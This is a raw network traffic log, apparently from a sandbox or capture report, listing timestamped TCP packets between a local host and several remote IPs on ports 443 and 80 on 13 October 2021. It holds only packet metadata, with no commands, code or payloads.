Oct 13, 2021 15:51:47.736299038 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:47.772136927 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:47.772291899 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:47.776086092 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:47.776264906 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:47.776279926 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.014790058 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.014946938 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.015045881 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.015085936 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.015261889 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.015484095 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.015671968 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.016721010 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.016916037 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.016949892 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.017385960 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.017590046 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.017621040 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.024432898 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.024571896 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.024709940 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.024760008 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.024770975 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.025005102 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.025228977 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.025428057 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.025474072 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.025685072 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.025949955 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.026106119 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.026140928 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.026350975 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.026573896 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.026797056 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.026843071 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.027048111 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.027275085 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.027499914 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.027545929 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.027704000 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.027915001 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.028067112 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.028094053 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.028315067 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.028702974 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.028861046 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.028960943 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.028995991 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.029045105 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.029196978 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.029536009 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.029752016 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.029787064 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.029990911 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.030298948 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.030452967 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.030483007 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.030729055 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.030791998 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.030936956 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.030961990 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.031105042 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.031465054 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.031722069 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.031766891 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.032040119 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.032269001 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.032474041 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.032520056 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.032710075 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.038316011 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.038482904 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.038508892 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.038542986 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.038636923 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.038784981 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.038882971 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.039093018 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.039108992 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.039144039 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.039225101 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.039249897 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.039299011 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.039483070 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.039901018 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.040101051 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.040139914 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.040277004 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.040374994 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.040420055 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.040442944 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.040570021 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.040826082 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.041054964 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.041088104 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.041224957 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.041235924 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.041259050 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.041455984 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.041488886 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.041701078 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.041863918 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.042030096 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.042062044 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.042084932 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.042237043 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.042273045 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.042298079 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.042496920 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.042726994 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.042880058 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.042901993 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.042920113 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.043093920 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.043128014 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.043337107 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.043481112 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.043694019 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.043740034 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.044017076 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.052220106 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.052386999 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.052414894 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.052433968 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.052576065 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.052634954 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.052659988 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.052723885 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.052772999 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.052828074 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.052855015 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.052999973 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.053036928 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.053283930 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.053436995 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.053458929 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.053477049 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.053605080 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.053642035 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.053667068 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.053798914 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.053911924 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.054054022 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.054269075 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.055062056 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.055222034 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.055258036 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.055362940 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.055438042 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.055479050 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.055500984 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.055558920 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.055636883 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.055648088 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.055665970 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.055851936 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.056061983 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.056207895 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.056236982 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.056335926 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.056406975 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.056442022 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.056463003 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.056524992 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.056577921 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.056705952 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.056751013 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.056910992 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.057267904 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.057420015 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.057477951 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.057503939 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.057565928 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.057653904 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.057661057 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.057682037 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.057884932 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.057933092 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.058108091 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.058276892 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.058423996 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.058435917 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.058460951 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.058556080 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.058574915 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.058590889 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.058767080 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.058805943 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.058837891 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.058943033 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.058964968 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.058980942 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.059132099 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.059156895 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.059376955 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.059402943 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.059545994 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.059648037 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.059788942 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.059803963 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.059818983 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.059935093 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.060086012 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.060105085 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.060247898 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.060275078 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.060409069 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.060463905 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.060486078 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.060553074 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.060616970 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.060674906 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.060790062 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.060837984 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.060868979 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.060930967 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.061022043 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.061191082 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.061336994 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.061439037 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.061465979 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.061489105 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.061609030 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.061661959 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.061798096 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.061824083 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.061865091 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.061939001 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.062103033 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.062128067 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.062280893 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.062325954 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.062491894 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.062555075 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.062577963 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.062700033 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.062773943 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.062841892 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.062865019 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.062941074 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.062984943 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.063085079 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.063106060 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.063235044 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.063272953 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.063293934 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.063378096 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.063457012 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.063515902 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.063533068 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.063550949 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.063740969 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.063975096 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.064057112 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:48.064482927 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.064531088 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:48.064577103 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:56.689955950 CEST	49828	80	192.168.11.20	199.101.245.90
Oct 13, 2021 15:51:57.699470043 CEST	49828	80	192.168.11.20	199.101.245.90
Oct 13, 2021 15:51:59.714596033 CEST	49828	80	192.168.11.20	199.101.245.90
Oct 13, 2021 15:52:00.324543953 CEST	49829	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:00.324630022 CEST	443	49829	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:00.324830055 CEST	49829	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:00.368026018 CEST	49829	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:00.368052959 CEST	443	49829	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:00.401726961 CEST	443	49829	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:00.401905060 CEST	49829	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:00.402494907 CEST	443	49829	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:00.402762890 CEST	49829	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:00.410500050 CEST	49829	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:00.410706997 CEST	443	49829	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:00.410861969 CEST	49829	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:00.412867069 CEST	49829	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:00.454015970 CEST	443	49829	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:00.692655087 CEST	443	49829	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:00.693033934 CEST	443	49829	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:00.693456888 CEST	49829	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:00.693501949 CEST	49829	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:00.695008993 CEST	49829	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:00.695060968 CEST	443	49829	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:00.724320889 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.724423885 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.724931955 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.725013018 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.725049019 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.764625072 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.764892101 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.766771078 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.766958952 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.771532059 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.771553040 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.771864891 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.772067070 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.772362947 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.813925028 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.966759920 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.967066050 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.967463017 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.967649937 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.967679977 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.968137026 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.968358994 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.969475031 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.969598055 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.969671011 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.969712019 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.969747066 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.969849110 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.970242023 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.971144915 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.971195936 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.971591949 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.976350069 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.976578951 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.976655960 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.976886988 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.976936102 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.977184057 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.977380037 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.977713108 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.977761984 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.977910042 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.978039980 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.978261948 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.978307962 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.978508949 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.978724957 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.978976965 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.979023933 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.979173899 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.979387045 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.979567051 CEST	49830	443	192.168.11.20	172.217.168.33
